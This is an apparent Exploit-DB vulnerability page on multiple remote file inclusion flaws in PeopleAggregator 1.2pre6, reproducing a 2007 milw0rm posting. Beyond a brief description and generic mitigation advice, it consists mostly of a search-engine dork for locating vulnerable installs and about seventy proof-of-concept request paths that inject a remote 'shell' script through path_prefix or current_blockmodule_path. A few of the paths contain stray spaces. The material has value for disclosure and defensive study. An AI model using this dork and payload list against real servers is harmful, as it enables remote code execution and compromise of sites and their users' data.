PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities

vendor:

PeopleAggregator

by:

Unknown

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PeopleAggregator

Affected Version From: 1.2pre6

Affected Version To: 1.2pre6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities

Multiple remote file inclusion vulnerabilities exist in PeopleAggregator 1.2pre6. These vulnerabilities allow an attacker to include arbitrary files from remote servers, potentially leading to remote code execution or information disclosure.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to a patched version of PeopleAggregator or apply relevant security patches provided by the vendor.

Source

Exploit-DB raw data:

#  PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities
#  http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz
#  DORK : "copyright 2006 Broadband Mechanics"
#  POC :
#  /web/Flickrclient.php?path_prefix=shell
#  /web/network_module_selector.php?path_prefix=shell
#  /web/submit_abuse.php?path_prefix=shell
#  /web/submit_comment.php?path_prefix=shell
#  /web/Administration/Includes/configureText.php?path_prefix=shell
#  /web/Administration/Includes/contentHome.php?path_prefix=shell
#  /web/Administration/Includes/deleteContent.php?path_prefix=shell
#  /web/Administration/Includes/deleteUser.php?path_prefix=shell
#  /web/Administration/Includes/userHome.php?path_prefix=shell
#  /web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=shell
#  /web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=shell
#  /web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=shell
#  /web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=shell
#  /web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=shell
#  /web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=shell
#  /web/BetaBlockModules/EditProfileModule/external.php?path_prefix=shell
#  /web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=shell
#  /web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=shell
#  /web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupForumModule/GroupForumModule.php?pa th_prefix=shell
#  /web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=shell
#  /web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=shell
#  /web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=shell
#  /web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=shell
#  /web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=shell
#  /web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=shell
#  /web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=shell
#  /web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=shell
#  /web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=shell
#  /web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=shell
#  /web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=shell
#  /web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=shell
#  /web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=shell
#  /web/BetaBlockModules//Module/Module.php?path_prefix=shell
#  /web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=shell
#  /web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=shell
#  /web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=shell
#  /web/BetaBlockModules/MyNetworksModule.php? path_prefix=shell
#  /web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=shell
#  /web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=shell
#  /web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=shell
#  /web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=shell
#  /web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=shell
#  /web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=shell
#  /web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=shell
#  /web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=shell
#  /web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=shell
#  /web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=shell
#  /web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=shell
#  /web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=shell
#  /web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=shell
#  /web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=shell
#  /web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=shell
#  /web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmo dule_path=shell
#  /web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=shell
#  /web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=shell
#  /web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=shell
#  /web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=shell
#  /web/includes/blogger.php?path_prefix=shell
#  /web/includes/functions/auto_email_notify.php?path_prefix=shell
#  /web/includes/functions/html_generate.php?path_prefix=shell
#  /web/includes/functions/validations.php?path_prefix=shell

# milw0rm.com [2007-10-21]